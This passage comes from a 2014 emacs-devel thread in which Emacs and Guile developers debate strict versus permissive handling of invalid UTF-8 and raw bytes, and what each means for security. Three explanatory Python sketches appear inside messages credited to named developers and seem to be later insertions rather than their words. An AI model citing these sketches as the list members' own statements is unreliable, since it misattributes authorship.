that is expected not to change anything it wasn't told to?

Btw, Emacs doesn't expose the internal representation of these bytes
easily to Lisp programs.  That is, whenever any program tries to
access the character at that position, it gets the original raw byte
that was there before the string was read from outside.  A Lisp
program needs some very tricky and deliberate techniques to access the
internal representation of such bytes.  (It isn't "overlong", btw, we
just represent the 128 bytes as codepoints in the 0x3fffXX range, and
encode it in UTF-8 with 5 bytes.)

> The Unicode standard requires that all UTF-8 codecs refuse to accept,
> produce, or propagate invalid byte sequences, including the troublesome
> overlong encodings.

What Emacs does is interpret each byte of such invalid byte sequences
as a separate raw byte, and represent each one of them internally as
described above.  Emacs cannot "refuse to propagate" the original
sequence, because users of an editor expect it not to alter any part
of the input that wasn't explicitly modified by the user or commands
she invoked.
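
For readers who want to experiment with this kind of behavior, Python's `surrogateescape` error handler is a loose analogue. This is an assumption made for illustration only: it is Python's mechanism, not the Emacs internal representation. Each byte of an invalid sequence becomes its own placeholder character, and re-encoding with the same handler restores the original bytes.

```python
original = b"a\xc0\xa2b"   # 'a', an overlong quote (invalid UTF-8), 'b'

# Decode leniently: every undecodable byte maps to one lone surrogate
# in the range U+DC80..U+DCFF.
text = original.decode("utf-8", errors="surrogateescape")

# Re-encode with the same handler: placeholders turn back into raw bytes.
round_tripped = text.encode("utf-8", errors="surrogateescape")

# A strict encoder refuses to emit the placeholders.
try:
    text.encode("utf-8")
    strict_refused = False
except UnicodeEncodeError:
    strict_refused = True
```

The untouched parts of the input survive unchanged, while a strict encode of the same string still fails, so both positions in this thread can be tried side by side.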

> I'm not one for blindly following standards, but in my opinion this
> is the default policy we should adopt.

So just passing a string unaltered through a Guile program would
change that string?  That sounds like an unpleasant surprise for
users, at least for Emacs users.  Emacs has been there, around v20.x,
and we still carry the scars.  It would be unwise, IMO, for Guile
to repeat those same mistakes.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 16:24                                             ` Eli Zaretskii
  2014-10-06 16:40                                               ` David Kastrup
@ 2014-10-06 17:04                                               ` Stephen J. Turnbull
  2014-10-06 17:34                                                 ` David Kastrup
  2014-10-07 14:03                                                 ` Richard Stallman
  1 sibling, 2 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-06 17:04 UTC (permalink / raw)
  To: Eli Zaretskii
  Cc: David Kastrup, rms, mhw, dmantipov, emacs-devel, handa, monnier

Eli Zaretskii writes:
 > > From: David Kastrup <dak@gnu.org>

 > Indeed.  But that's what is expected from an editor: not to change the
 > stuff the user didn't touch.

If the user thinks of the "stuff" as characters, they will be unhappy
if the editor displays raw bytes for something that could be decoded,
and they will prefer standards conforming output, if only in those
instances where non-conformant output results in an explosion in a
later processor.

Of course you are quite right that there are many cases where the user
would be happiest if the editor didn't touch any byte sequence that the
user didn't explicitly tell it to touch.

My point is that neither approach is always right.

 > > The solution obviously is to use a coding scheme for recoding that
 > > does _not_ reproduce unencodable bytes.
 > 
 > An editor such as Emacs cannot do that, I think.

It should do so as an option, with the alternative being to ask for
confirmation (this would be automatically satisfied if input and
output rawbytes handlers were separate) if nonconforming output would
be produced.  Emacs of *all* editors should not produce non-conforming
output silently (unless explicitly silenced), even if it got
non-conforming input.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 16:47                                             ` Eli Zaretskii
@ 2014-10-06 17:31                                               ` David Kastrup
  2014-10-06 17:58                                                 ` David Kastrup
  2014-10-06 17:43                                               ` Stephen J. Turnbull
                                                                 ` (2 subsequent siblings)
  3 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-06 17:31 UTC (permalink / raw)
  To: Eli Zaretskii
  Cc: rms, Mark H Weaver, dmantipov, emacs-devel, handa, monnier,
	stephen

Eli Zaretskii <eliz@gnu.org> writes:

> Btw, Emacs doesn't expose the internal representation of these bytes
> easily to Lisp programs.  That is, whenever any program tries to
> access the character at that position, it gets the original raw byte
> that was there before the string was read from outside.  A Lisp
> program needs some very tricky and deliberate techniques to access the
> internal representation of such bytes.  (It isn't "overlong", btw, we
> just represent the 128 bytes as codepoints in the 0x3fffXX range, and
> encode it in UTF-8 with 5 bytes.)

Oh.  Didn't we use 3byte surrogate words (also not valid Unicode but
encodable as 3 bytes) here?

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 17:04                                               ` Stephen J. Turnbull
@ 2014-10-06 17:34                                                 ` David Kastrup
  2014-10-07  0:33                                                   ` Stephen J. Turnbull
  2014-10-07 14:03                                                 ` Richard Stallman
  1 sibling, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-06 17:34 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: rms, mhw, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> It should do so as an option, with the alternative being to ask for
> confirmation (this would be automatically satisfied if input and
> output rawbytes handlers were separate) if nonconforming output would
> be produced.  Emacs of *all* editors should not produce non-conforming
> output silently (unless explicitly silenced), even if it got
> non-conforming input.

That sounds like you are talking about a processing pipe.  An editor is
not really the same.  Even for something like sed I'd expect no changes
in parts that are, well, not changed.  Much more so for a proper editor.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 16:47                                             ` Eli Zaretskii
  2014-10-06 17:31                                               ` David Kastrup
@ 2014-10-06 17:43                                               ` Stephen J. Turnbull
  2014-10-06 17:53                                                 ` David Kastrup
  2014-10-07 14:03                                                 ` Richard Stallman
  2014-10-06 18:04                                               ` Stefan Monnier
  2014-10-07 14:04                                               ` Richard Stallman
  3 siblings, 2 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-06 17:43 UTC (permalink / raw)
  To: Eli Zaretskii
  Cc: dak, rms, Mark H Weaver, dmantipov, emacs-devel, handa, monnier

Eli Zaretskii writes:
 > > From: Mark H Weaver <mhw@netris.org>

 > > It doesn't matter how these raw bytes are encoded internally.  No
 > > matter what mechanism we use to accomplish it, propagating
 > > invalid byte sequences by default is bad security policy.
 > 
 > How can we be responsible for byte streams that originated outside?

By taking responsibility for them. ;-)

 > That's the responsibility of the source.  And if there is a consumer,
 > then it is their responsibility not to trip upon such bytes.

Not in a security context.  In a security context, you want defense in
depth: all separately developed components cooperate in covering up
each others' bugs by handling input carefully and refusing to transmit
broken output unless that is explicitly requested by the consumer (and
you trust it to know what it's doing when it says, "don't worry, I can
handle anything"!)

 > But how can you refuse to copy such bytes when you are just a pipe
 > that is expected not to change anything it wasn't told to?

By signaling an error and terminating.  That's what a conformant
Unicode process does.

Note that the standard doesn't say you have to throw away state and
give up entirely.  It just says that if you do try to continue, you're
not conforming any more.

 > > The Unicode standard requires that all UTF-8 codecs refuse to
 > > accept, produce, or propagate invalid byte sequences, including
 > > the troublesome overlong encodings.

Again, what the Unicode standard says is that a codec that does any of
those things may not call itself conformant.  It doesn't say anything
about nonconformant codecs -- which include all non-Unicode codecs, of
course.  So we already know that Emacs is going to be nonconformant in
some use cases.  However, it should be aware of the fact when it is
not conforming to applicable standards.

 > So just passing a string unaltered through a Guile program would
 > change that string?

If it is a stream of bytes which is alleged to conform to some
standard but in fact does not, a program should (in general IMO, and
by the Unicode standard if it claims Unicode conformance) signal an
error and stop.  If the program wishes to pick up where it left off in
nonconformant mode and continue processing, that's fine (but it isn't
conformant any more).  In other words, "correcting" the string would
be a nonconformant behavior.

But this must be an explicit decision by the program (and it mustn't
do that if the user wants conformance).  Mark is absolutely correct
that the Guile system should not default to non-conformance, and I
don't think Emacs based on Guile should either, but that's up to the
Emacs community to decide, of course.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 17:43                                               ` Stephen J. Turnbull
@ 2014-10-06 17:53                                                 ` David Kastrup
  2014-10-07  0:35                                                   ` Stephen J. Turnbull
  2014-10-07 14:03                                                 ` Richard Stallman
  1 sibling, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-06 17:53 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: rms, Mark H Weaver, dmantipov, emacs-devel, handa, monnier,
	Eli Zaretskii

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> Eli Zaretskii writes:
>  > > From: Mark H Weaver <mhw@netris.org>
>
>  > > It doesn't matter how these raw bytes are encoded internally.  No
>  > > matter what mechanism we use to accomplish it, propagating
>  > > invalid byte sequences by default is bad security policy.
>  > 
>  > How can we be responsible for byte streams that originated outside?
>
> By taking responsibility for them. ;-)
>
>  > That's the responsibility of the source.  And if there is a consumer,
>  > then it is their responsibility not to trip upon such bytes.
>
> Not in a security context.  In a security context, you want defense in
> depth: all separately developed components cooperate in covering up
> each others' bugs by handling input carefully and refusing to transmit
> broken output unless that is explicitly requested by the consumer (and
> you trust it to know what it's doing when it says, "don't worry, I can
> handle anything"!)

In a security relevant context, you would just not reencode before
passing the information back to the outside.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 17:31                                               ` David Kastrup
@ 2014-10-06 17:58                                                 ` David Kastrup
  2014-10-07  2:35                                                   ` Eli Zaretskii
  0 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-06 17:58 UTC (permalink / raw)
  To: emacs-devel

David Kastrup <dak@gnu.org> writes:

> Eli Zaretskii <eliz@gnu.org> writes:
>
>> Btw, Emacs doesn't expose the internal representation of these bytes
>> easily to Lisp programs.  That is, whenever any program tries to
>> access the character at that position, it gets the original raw byte
>> that was there before the string was read from outside.  A Lisp
>> program needs some very tricky and deliberate techniques to access the
>> internal representation of such bytes.  (It isn't "overlong", btw, we
>> just represent the 128 bytes as codepoints in the 0x3fffXX range, and
>> encode it in UTF-8 with 5 bytes.)
>
> Oh.  Didn't we use 3byte surrogate words (also not valid Unicode but
> encodable as 3 bytes) here?

Actually, one could even use overlong encodings of 0--127 (to represent
raw bytes 128--255) and use only two bytes that way, but that's really
asking for reencoding trouble.
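
A small Python sketch of the two-byte scheme described in the paragraph above, under the assumption that raw byte b (128..255) is stored as the overlong two-byte UTF-8 encoding of b - 128. The function names are hypothetical and this is not presented as the actual Emacs code.

```python
def raw_byte_to_two_bytes(b: int) -> bytes:
    """Store raw byte b (0x80..0xFF) as the overlong encoding of b - 0x80."""
    if not 0x80 <= b <= 0xFF:
        raise ValueError("not a raw 8-bit byte")
    c = b - 0x80                      # 0..127, needs 7 bits
    return bytes([0xC0 | (c >> 6),    # lead byte is 0xC0 or 0xC1
                  0x80 | (c & 0x3F)]) # continuation byte with the low 6 bits


def two_bytes_to_raw_byte(pair: bytes) -> int:
    """Inverse mapping; rejects anything that is not a 0xC0/0xC1 pair."""
    lead, cont = pair
    if lead not in (0xC0, 0xC1) or (cont & 0xC0) != 0x80:
        raise ValueError("not an overlong raw-byte pair")
    return 0x80 + (((lead & 0x01) << 6) | (cont & 0x3F))


# Raw byte 0xA2 is stored as C0 A2, the same bytes as an overlong '"'.
collision = raw_byte_to_two_bytes(0xA2)
```

The collision in the last line is one way to see the reencoding trouble: the internal form of raw byte 0xA2 is indistinguishable from an overlong ASCII quote arriving from outside.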

-- 
David Kastrup




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 16:47                                             ` Eli Zaretskii
  2014-10-06 17:31                                               ` David Kastrup
  2014-10-06 17:43                                               ` Stephen J. Turnbull
@ 2014-10-06 18:04                                               ` Stefan Monnier
  2014-10-06 23:00                                                 ` Mark H Weaver
  2014-10-07 14:03                                                 ` Richard Stallman
  2014-10-07 14:04                                               ` Richard Stallman
  3 siblings, 2 replies; 261+ messages in thread
From: Stefan Monnier @ 2014-10-06 18:04 UTC (permalink / raw)
  To: Eli Zaretskii
  Cc: dak, rms, Mark H Weaver, dmantipov, emacs-devel, handa, stephen

Please, could you move this discussion elsewhere.  While I understand
the Guile developers might want to try and reuse either Emacs's code
or at least its design and expertise, this discussion is about Guile,
not about Emacs, so please move it to a Guile mailing-list.


        Stefan



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06  3:18                                       ` Stephen J. Turnbull
@ 2014-10-06 19:15                                         ` Richard Stallman
  2014-10-07  0:46                                           ` Stephen J. Turnbull
  2014-10-10 10:09                                           ` Thien-Thi Nguyen
  0 siblings, 2 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-06 19:15 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, eliz

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

     > I'd like to know how it is that "raw bytes" have security implications.
     > Are there programs that make assumptions about the contents of strings?
     > That seems like bad design.

    Yes, they do, and no, it's poor implementation, not bad design --
    they're conforming to standards that say that string contents will
    have a specific form and are unfortunately imperfectly protected from
    invalid input by their I/O modules (for example, the \201 bug in Emacs
    itself).

      ...If that program is a
    spam/virus checker,...

Do people write spam/virus checkers using Guile?

This issue is specifically about Guile.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 16:27                                           ` Mark H Weaver
  2014-10-06 16:47                                             ` Eli Zaretskii
@ 2014-10-06 19:17                                             ` Richard Stallman
  2014-10-06 19:59                                               ` David Kastrup
  2014-10-07  0:10                                               ` Mark H Weaver
  1 sibling, 2 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-06 19:17 UTC (permalink / raw)
  To: Mark H Weaver; +Cc: dak, dmantipov, emacs-devel, handa, monnier, eliz, stephen

    However, I would argue that even in Emacs, string<->bytevector
    conversions should be strict by default,

What is a "bytevector"?  It doesn't appear in the Emacs Lisp
ref manual, so I suppose it is a concept from Scheme.
How would it relate to Emacs?  Maybe your suggestion is a good one.

    It doesn't matter how these raw bytes are encoded internally.  No matter
    what mechanism we use to accomplish it, propagating invalid byte
    sequences by default is bad security policy.

As a general matter, the policy that programs should not get upset
when they see invalid UTF-8 seems more secure than the policy that
programs should not propagate invalid UTF-8.  But, given the
situation, it isn't useful to debate that theoretical question.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 19:17                                             ` Richard Stallman
@ 2014-10-06 19:59                                               ` David Kastrup
  2014-10-07  0:10                                               ` Mark H Weaver
  1 sibling, 0 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-06 19:59 UTC (permalink / raw)
  To: Richard Stallman
  Cc: Mark H Weaver, dmantipov, emacs-devel, handa, monnier, eliz,
	stephen

Richard Stallman <rms@gnu.org> writes:

>     However, I would argue that even in Emacs, string<->bytevector
>     conversions should be strict by default,
>
> What is a "bytevector"?  It doesn't appear in the Emacs Lisp
> ref manual, so I suppose it is a concept from Scheme.
> How would it relate to Emacs?  Maybe your suggestion is a good one.

Unibyte string minus the string part.  Basically what decoding works
from to generate strings and vice versa.

But in GUILE, you cannot use string functions on them: they are
basically arrays with byte elements.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 18:04                                               ` Stefan Monnier
@ 2014-10-06 23:00                                                 ` Mark H Weaver
  2014-10-07  1:04                                                   ` Stefan Monnier
  2014-10-07 14:03                                                 ` Richard Stallman
  1 sibling, 1 reply; 261+ messages in thread
From: Mark H Weaver @ 2014-10-06 23:00 UTC (permalink / raw)
  To: Stefan Monnier
  Cc: dak, rms, dmantipov, emacs-devel, handa, Eli Zaretskii, stephen

Stefan Monnier <monnier@iro.umontreal.ca> writes:

> Please, could you move this discussion elsewhere.  While I understand
> the Guile developers might want to try and reuse either Emacs's code
> or at least its design and expertise, this discussion is about Guile,
> not about Emacs,

I think this is false.  This discussion, initiated by Richard, is about
how Guile can adapt itself to better meet the needs of Emacs.  If the
discussion happens where very few Emacs users/developers are present,
then I don't see how it can be useful.

      Mark



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 19:17                                             ` Richard Stallman
  2014-10-06 19:59                                               ` David Kastrup
@ 2014-10-07  0:10                                               ` Mark H Weaver
  2014-10-07 14:04                                                 ` Richard Stallman
  1 sibling, 1 reply; 261+ messages in thread
From: Mark H Weaver @ 2014-10-07  0:10 UTC (permalink / raw)
  To: Richard Stallman
  Cc: dak, dmantipov, emacs-devel, handa, monnier, eliz, stephen

Richard Stallman <rms@gnu.org> writes:

>     However, I would argue that even in Emacs, string<->bytevector
>     conversions should be strict by default,
>
> What is a "bytevector"?

Bytevectors are packed arrays of unsigned integers < 256.  They are the
standard Scheme data type for performing binary I/O.  String operations
deliberately do not work on them.

In contrast, strings are packed arrays of characters, which in Scheme
are not integers but rather an abstract type representing Unicode code
points.

> How would it relate to Emacs?  Maybe your suggestion is a good one.

Implicit string<->bytevector conversions are needed almost every time a
string is passed to/from the C world, since most C APIs are based on
bytes not Unicode characters.  This includes I/O, command-line arguments
and environment variables (whether reading the ones given to us or
passing new ones down to subprocesses), POSIX file names, interfacing
with most C libraries, etc.

My suggestion is that these implicit conversions should be strict by
default.  IMO, only in specific cases (most notably when editing a file)
should invalid byte sequences be accepted, produced, or propagated.

The reasons are (1) to protect internal subsystems (subprocesses, C
functions linked with Guile, etc) from invalid input such as overlong
encodings, and (2) to catch errors early rather than silently producing
garbage in the face of programming errors.

However, it is of course up to the Emacs community to decide when
conversions should be strict.  Guile can provide both modes of
operation.
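
The "strict by default, permissive on request" policy can be sketched in Python as follows. The names `string_to_bytes` and `bytes_to_string` and the `strict` keyword are hypothetical; they are not Guile or Emacs APIs, and the permissive mode borrows Python's `surrogateescape` handler as a stand-in for a lossless raw-byte mode.

```python
def bytes_to_string(data: bytes, *, strict: bool = True) -> str:
    """Decode UTF-8; invalid input is an error unless strict=False."""
    return data.decode("utf-8", "strict" if strict else "surrogateescape")


def string_to_bytes(text: str, *, strict: bool = True) -> bytes:
    """Encode UTF-8; raw-byte placeholders are an error unless strict=False."""
    return text.encode("utf-8", "strict" if strict else "surrogateescape")


bad = b"file-\xc0\xa2.txt"

# Default path (sockets, pipes, argv, ...): the malformed input is caught early.
try:
    bytes_to_string(bad)
    rejected = False
except UnicodeDecodeError:
    rejected = True

# Explicit opt-in (e.g. visiting a file for editing): bytes survive a round trip.
edited = bytes_to_string(bad, strict=False)
restored = string_to_bytes(edited, strict=False)
```

The design point is only that the caller has to ask for the permissive mode; which callers should do so is the policy question left to each community.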

      Mark



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 17:34                                                 ` David Kastrup
@ 2014-10-07  0:33                                                   ` Stephen J. Turnbull
  0 siblings, 0 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-07  0:33 UTC (permalink / raw)
  To: David Kastrup; +Cc: mhw, emacs-devel

David Kastrup writes:

 > That sounds like you are talking about a processing pipe.

No, I'm talking about a Unicode conformant process.  If you don't need
Unicode conformance and do need to emit garbage, you can specify a
Unicode-like but non-conformant codec.  All I'm saying (and Mark I
believe is on the same page, if not the same octet) is that

(1) Emacs codecs corresponding to published standards (specifically,
    UTF-8 and other UTFs) should conform to those standards by
    default, even where that means annoying users (they'll learn to
    request non-conformant codecs if that's really what they want).

(2) Emacs should make special effort at conformance with Unicode
    because it is especially well-defined.

Making this pleasant for users will require some effort, but will be
well worth it in the end.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 17:53                                                 ` David Kastrup
@ 2014-10-07  0:35                                                   ` Stephen J. Turnbull
  0 siblings, 0 replies; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-07  0:35 UTC (permalink / raw)
  To: David Kastrup
  Cc: rms, Mark H Weaver, dmantipov, emacs-devel, handa, monnier,
	Eli Zaretskii

David Kastrup writes:

 > In a security relevant context, you would just not reencode before
 > passing the information back to the outside.

That is ill-defined and almost surely not conforming to the process's
documentation, and therefore would not be acceptable in a security
context.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 19:15                                         ` Richard Stallman
@ 2014-10-07  0:46                                           ` Stephen J. Turnbull
  2014-10-07 14:04                                             ` Richard Stallman
  2014-10-10 10:09                                           ` Thien-Thi Nguyen
  1 sibling, 1 reply; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-07  0:46 UTC (permalink / raw)
  To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, eliz

Richard Stallman writes:

 > Do people write spam/virus checkers using Guile?

I don't know.  Why do you care?  The example is valid, and they
*might*, in which case they need conservative (conformant when
conformance is implied by names, such as "UTF-8") behavior.  If such a
user discovers that Guile emits nonconformant UTF-8, they'll surely
have to wonder what other security holes they've imported by simply
selecting Guile as an application platform.

To put it another way, Mark said that Guile is intended to be useful
writing servers as well as interactive programs.  Spam checking is
simply a convenient example of a daemon application where undefined
behavior can easily result in undesired output.

However, the general principle is that undefined behavior can
sometimes be exploited, and therefore processes that run unattended
should have *all* their behavior defined.

This doesn't necessarily apply to Emacs, although I think it should.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 23:00                                                 ` Mark H Weaver
@ 2014-10-07  1:04                                                   ` Stefan Monnier
  0 siblings, 0 replies; 261+ messages in thread
From: Stefan Monnier @ 2014-10-07  1:04 UTC (permalink / raw)
  To: Mark H Weaver
  Cc: dak, rms, dmantipov, emacs-devel, handa, Eli Zaretskii, stephen

> I think this is false.  This discussion, initiated by Richard, is about
> how Guile can adapt itself to better meet the needs of Emacs.  If the
> discussion happens where very few Emacs users/developers are present,
> then I don't see how it can be useful.

I understand you want Emacs developers to participate.  But I don't want
Emacs's mailing list to be drowned any more than it already is.


        Stefan


PS: Also I don't see why this discussion is useful at all.  It's just
people arguing about opinions, which I can't imagine you need any more
of.  If you need to know how Emacs works, just ask us.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-06 17:58                                                 ` David Kastrup
@ 2014-10-07  2:35                                                   ` Eli Zaretskii
  0 siblings, 0 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-07  2:35 UTC (permalink / raw)
  To: David Kastrup; +Cc: emacs-devel

> From: David Kastrup <dak@gnu.org>
> Date: Mon, 06 Oct 2014 19:58:08 +0200
> 
> David Kastrup <dak@gnu.org> writes:
> 
> > Eli Zaretskii <eliz@gnu.org> writes:
> >
> >> Btw, Emacs doesn't expose the internal representation of these bytes
> >> easily to Lisp programs.  That is, whenever any program tries to
> >> access the character at that position, it gets the original raw byte
> >> that was there before the string was read from outside.  A Lisp
> >> program needs some very tricky and deliberate techniques to access the
> >> internal representation of such bytes.  (It isn't "overlong", btw, we
> >> just represent the 128 bytes as codepoints in the 0x3fffXX range, and
> >> encode it in UTF-8 with 5 bytes.)
> >
> > Oh.  Didn't we use 3byte surrogate words (also not valid Unicode but
> > encodable as 3 bytes) here?
> 
> Actually, one could even use overlong encodings of 0--127 (to represent
> raw bytes 128--255) and use only two bytes that way, but that's really
> asking for reencoding trouble.

As a matter of fact, we use a 2-byte representation for them.  What I
wrote above about 5 bytes is incorrect, sorry.
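
To make the two-byte idea concrete, here is a minimal Python sketch of
the overlong scheme David describes above: a raw byte 128--255 is stored
as the overlong two-byte UTF-8 form of the value 0--127.  The function
names are hypothetical, and that this matches the actual internal layout
byte for byte is an assumption, not something established in this thread.

```python
def raw_byte_to_two_bytes(b: int) -> bytes:
    """Encode raw byte 0x80..0xFF as the overlong 2-byte form of b - 0x80."""
    if not 0x80 <= b <= 0xFF:
        raise ValueError("only bytes 0x80..0xFF need a raw-byte representation")
    v = b - 0x80  # value in 0..127
    # 2-byte UTF-8 layout is 110xxxxx 10xxxxxx; for v < 128 the lead byte
    # can only be 0xC0 or 0xC1, which valid UTF-8 never uses.
    return bytes([0xC0 | (v >> 6), 0x80 | (v & 0x3F)])


def two_bytes_to_raw_byte(pair: bytes) -> int:
    """Inverse of raw_byte_to_two_bytes."""
    lead, trail = pair
    if lead not in (0xC0, 0xC1) or not 0x80 <= trail <= 0xBF:
        raise ValueError("not a raw-byte pair")
    return 0x80 + (((lead & 0x01) << 6) | (trail & 0x3F))
```

Because valid UTF-8 never contains the lead bytes 0xC0 or 0xC1, such
pairs cannot collide with real characters, which is also why they are
"asking for reencoding trouble" if they ever leak out.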




* Re: Emacs Lisp's future
  2014-10-06 17:04                                               ` Stephen J. Turnbull
  2014-10-06 17:34                                                 ` David Kastrup
@ 2014-10-07 14:03                                                 ` Richard Stallman
  2014-10-07 14:37                                                   ` Eli Zaretskii
  1 sibling, 1 reply; 261+ messages in thread
From: Richard Stallman @ 2014-10-07 14:03 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, eliz

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    If the user thinks of the "stuff" as characters, they will be unhappy
    if the editor displays raw bytes for something that could be decoded,

What case does that refer to, concretely?

Emacs normally recognizes UTF-8 text and decodes it.  If some text
isn't proper UTF-8, it may use raw bytes for that text.  But when does
it do this for text that can be decoded as UTF-8?  I don't think
that ever happens.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.





* Re: Emacs Lisp's future
  2014-10-06 17:43                                               ` Stephen J. Turnbull
  2014-10-06 17:53                                                 ` David Kastrup
@ 2014-10-07 14:03                                                 ` Richard Stallman
  2014-10-07 14:21                                                   ` David Kastrup
  1 sibling, 1 reply; 261+ messages in thread
From: Richard Stallman @ 2014-10-07 14:03 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, eliz

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

In the GNU Project, we do not "obey" standards.  Rather, we take them
into account when judging what is best for the program to do.

Emacs could conceivably report an error after decoding a file as UTF-8
which turns out to have invalid text.  That way, the user will have
the chance to decide whether to accept the decoding or not.  If the user
accepts it, the buffer should represent everything that is in the file.


-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.





* Re: Emacs Lisp's future
  2014-10-06 18:04                                               ` Stefan Monnier
  2014-10-06 23:00                                                 ` Mark H Weaver
@ 2014-10-07 14:03                                                 ` Richard Stallman
  1 sibling, 0 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-07 14:03 UTC (permalink / raw)
  To: Stefan Monnier; +Cc: dak, mhw, dmantipov, emacs-devel, handa, eliz, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

This discussion is about making Guile and Emacs work together.
I can't think of any other list that would be as good.
If this were an ongoing thing, perhaps we should make a new list,
but I don't think it will be needed.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.





* Re: Emacs Lisp's future
  2014-10-07  0:10                                               ` Mark H Weaver
@ 2014-10-07 14:04                                                 ` Richard Stallman
  0 siblings, 0 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-07 14:04 UTC (permalink / raw)
  To: Mark H Weaver; +Cc: dak, dmantipov, emacs-devel, handa, monnier, eliz, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    My suggestion is that these implicit conversions should be strict by
    default.

I see no problem with that.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.





* Re: Emacs Lisp's future
  2014-10-07  0:46                                           ` Stephen J. Turnbull
@ 2014-10-07 14:04                                             ` Richard Stallman
  2014-10-07 15:43                                               ` Stephen J. Turnbull
  0 siblings, 1 reply; 261+ messages in thread
From: Richard Stallman @ 2014-10-07 14:04 UTC (permalink / raw)
  To: Stephen J. Turnbull
  Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, eliz

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

     > Do people write spam/virus checkers using Guile?

    I don't know.  Why do you care?

Because hypothetical examples that I think are unlikely to really
occur carry very little weight in this argument.

      If such a
    user discovers that Guile emits nonconformant UTF-8, they'll surely
    have to wonder what other security holes they've imported by simply
    selecting Guile as an application platform.

I don't think we should make practical decisions based on such "What
would they think?" arguments.  We should do what's right, and people
